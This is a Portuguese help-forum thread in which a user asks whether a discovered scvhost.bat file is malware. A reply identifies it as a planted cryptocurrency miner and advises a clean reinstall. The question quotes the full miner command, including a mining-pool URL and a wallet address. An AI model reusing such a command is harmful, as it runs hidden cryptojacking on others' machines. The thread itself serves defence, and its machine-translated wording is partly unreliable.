Este scvhost.bat com cryptonight é um vírus ou mineiro?

17

Acabei de encontrar este arquivo .bat chamado scvhost.bat. O arquivo tinha esse conteúdo:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Este é um vírus (para roubar informações, etc) ou um mineiro plantado? Estou preocupado porque também me dedico a moedas criptografadas e stratum é uma moeda mencionada no arquivo acima.

    
por NewbieProgrammer 16.01.2018 / 09:36

1 resposta

34

Isso parece ser um minerador de algum tipo, especialmente porque o parâmetro contém o URL para um pool de mineração. No entanto, você precisa ter certeza do que está no binário. Não faria sentido comparar somas de verificação do binário que você encontrou do seu sistema com as liberações feitas pela equipe de desenvolvimento do minerador. Se eles diferirem; considere seu sistema inseguro.

Outra questão é que você descobriu sobre este minerador (provavelmente porque ele estava usando muita CPU), mas você não tem idéia do que mais aconteceu em seu sistema. Se um intruso pudesse lançar o mineiro, eles poderiam ter lançado outras coisas também. Pode ser uma boa ideia recuperar do backup ou fazer uma nova instalação de qualquer maneira.

    
por 16.01.2018 / 09:43